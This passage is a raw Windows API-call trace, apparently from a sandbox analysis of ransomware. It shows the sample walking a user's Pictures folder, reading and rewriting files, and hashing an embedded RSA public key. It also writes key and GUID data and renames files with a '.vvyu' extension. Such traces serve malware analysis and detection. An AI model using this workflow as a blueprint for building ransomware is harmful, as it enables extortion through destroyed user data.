hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39af0 | out: hHeap=0x6a0000) returned 1 [0190.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0190.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0190.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0190.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0190.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0190.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0190.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0190.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0190.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0190.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b20 | out: hHeap=0x6a0000) returned 1 [0190.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b68 | out: hHeap=0x6a0000) returned 1 [0190.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b08 | out: hHeap=0x6a0000) returned 1 [0190.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ad8 | out: hHeap=0x6a0000) returned 1 [0190.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0190.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0190.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0190.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ac0 | out: hHeap=0x6a0000) returned 1 [0190.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39600 | out: hHeap=0x6a0000) returned 1 [0190.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0190.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0190.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0190.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0190.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0190.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0190.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0190.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0190.272] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0xe11b, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0xe11b, lpOverlapped=0x0) returned 1 [0190.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.273] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe120, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.273] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0190.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70068 [0190.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0190.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0190.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70068 | out: hHeap=0x6a0000) returned 1 [0190.274] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0190.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.274] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.274] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0190.275] CloseHandle (hObject=0x584) returned 1 [0190.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d2ed98 [0190.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d42908 [0190.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ed98 | out: hHeap=0x6a0000) returned 1 [0190.278] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\E07daaq0LDB.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\e07daaq0ldb.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\E07daaq0LDB.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\e07daaq0ldb.bmp.vvyu")) returned 1 [0190.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.279] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x723d10 | out: hHeap=0x6a0000) returned 1 [0190.282] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68188070, ftCreationTime.dwHighDateTime=0x1d898ad, ftLastAccessTime.dwLowDateTime=0x78909240, ftLastAccessTime.dwHighDateTime=0x1d8a009, ftLastWriteTime.dwLowDateTime=0x78909240, ftLastWriteTime.dwHighDateTime=0x1d8a009, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="E5UCc4GR1Z tMgYPe", cAlternateFileName="E5UCC4~1")) returned 1 [0190.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0190.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0190.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0190.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0190.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0190.283] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe67fc20, ftCreationTime.dwHighDateTime=0x1d89c42, ftLastAccessTime.dwLowDateTime=0xa66a5cf0, ftLastAccessTime.dwHighDateTime=0x1d89d07, ftLastWriteTime.dwLowDateTime=0xa66a5cf0, ftLastWriteTime.dwHighDateTime=0x1d89d07, nFileSizeHigh=0x0, nFileSizeLow=0x13901, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gFRsS2-OR13.gif", cAlternateFileName="GFRSS2~1.GIF")) returned 1 [0190.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0190.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x76) returned 0x723d10 [0190.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0190.283] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\gFRsS2-OR13.gif") returned=".gif" [0190.283] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\gFRsS2-OR13.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\gfrss2-or13.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.285] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=80129) returned 1 [0190.285] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0190.288] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x138db, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.288] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0190.290] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.290] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x13901, lpOverlapped=0x0) returned 1 [0190.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0190.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.292] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0190.293] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0190.293] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.293] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0190.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0190.294] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0190.294] GetLastError () returned 0x0 [0190.294] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0190.294] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0190.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0190.294] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0190.294] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0190.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.294] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0190.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x13900) returned 0x2d45778 [0190.295] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0190.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0190.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0190.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39600 [0190.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ac0 [0190.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30d48 [0190.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ad8 [0190.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b08 [0190.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b68 [0190.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b20 [0190.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0190.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0190.296] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0190.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0190.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b08 | out: hHeap=0x6a0000) returned 1 [0190.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b20 | out: hHeap=0x6a0000) returned 1 [0190.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b68 | out: hHeap=0x6a0000) returned 1 [0190.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0190.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b68 [0190.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0190.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b20 [0190.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0190.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39b08 [0190.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0190.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0190.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0190.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0190.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0190.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0190.298] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b20 | out: hHeap=0x6a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b08 | out: hHeap=0x6a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39b68 | out: hHeap=0x6a0000) returned 1 [0190.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0190.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0190.301] GetCurrentThreadId () returned 0x264 [0190.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0190.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44480 [0190.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0190.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0190.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0190.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0190.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.302] GetCurrentThreadId () returned 0x264 [0190.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0190.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0190.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0190.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0190.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b68 [0190.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0190.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0190.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0190.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b08 [0190.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0190.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0190.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0190.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0190.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39b20 [0190.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0190.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0190.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0190.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39af0 [0190.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0190.306] RtlAllocateHeap (HeapHandle=0x6a0000, 